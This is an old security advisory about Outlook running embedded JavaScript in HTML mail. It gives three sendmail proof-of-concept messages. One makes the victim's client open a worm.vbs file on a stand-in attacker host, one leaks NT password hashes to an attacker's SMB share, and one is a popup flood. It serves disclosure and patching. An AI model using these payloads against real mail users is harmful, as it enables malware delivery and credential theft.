COMMAND

    Outlook

SYSTEMS AFFECTED

    Microsoft Outlook

PROBLEM

    cassius  found  following.   Outlook  HTML  messages with embedded
    JavaScript window.open()  calls can  automatically open  malicious
    URLs.  An attacker could use this vulnerability to make it  appear
    that the user has received an attachment that has passed all  SMTP
    scanners.   The risk  here is  high, as  this vulnerability  could
    allow  another  'ILoveYou'  type  virus  to propagate with minimal
    resistance.

    This  vulnerability   also  opens   Outlook  and   possibly  other
    HTML/JavaScript  enabled  E-mail  clients  to  a  variety of other
    malicious URL attacks.   Examples of possible  attacks seem to  be
    endless.   He has  been able  to send  messages that, when opened,
    automatically  send  a  NT  users  password  hash to a box running
    L0phtCrack in SMB packet capture mode.   This is a variation on  a
    known attack that relies on  social engineering to get the  victim
    to click on a link within the message.

    He  has  tested  the  following  exploits against Outlook 2000 and
    Outlook Express.   Suppose all versions  that allow HTML  messages
    with  embedded  JavaScript  are  vulnerable.   Outlook 2000 is not
    vulnerable when the  message is viewed  in the preview  pane or if
    the Outlook Security Update has been installed.

    The  following  examples  use  Sendmail  to  craft  the  messages.
    Outlook does not normally give you enough control of HTML  message
    source to send these messages.

    Example 1 - Sending Fake Attachments
    ====================================

        % sendmail victim@example.com
        MIME-Version: 1.0
        Content-Type: text/html
        Subject: I love you not.

        <html><script language="JavaScript"><!--
        window.open('http://evilcomputer.example.com/worm.vbs');
        --></script>I have attached a file for you.</html>
        
        .

    When the victim  opens the message  an IE dialog  box is displayed
    that  prompts  the  user  to  open  the  file  or download it.  An
    unsuspecting  user  could  be  tricked  into  thinking  that  this
    'attachment' has passed all SMTP security scans.

    Example 2 - Requesting NT Password Hashes
    =========================================
    Set up L0phtCrack to sniff SMB packets on evilcomputer.  Then send
    the following message.

        % sendmail victim@example.com
        MIME-Version: 1.0
        Content-Type: text/html
        Subject: Give me your hash.
        
        <html><script language="JavaScript"><!--
        window.open('file:////evilcomputer/sharename/thankyou.html');
        --></script>Blah blah blah.</html>
        
        .

    Example 3 - Annoying DoS Attack

        % sendmail victim@example.com
        MIME-Version: 1.0
        Content-Type: text/html
        Subject: b00m!
        
        <html><script language="JavaScript"><!--
        for (loop=0; loop < 1000; loop++) { window.open('about:<b><h1>Die!'); }
        --></script></html>
        
        .

SOLUTION

    The solution for Outlook 98/2000  users is to install the  Outlook
    E-mail Security Update.   Outlook Express users should  upgrade to
    Outlook 2000 or some other mail client.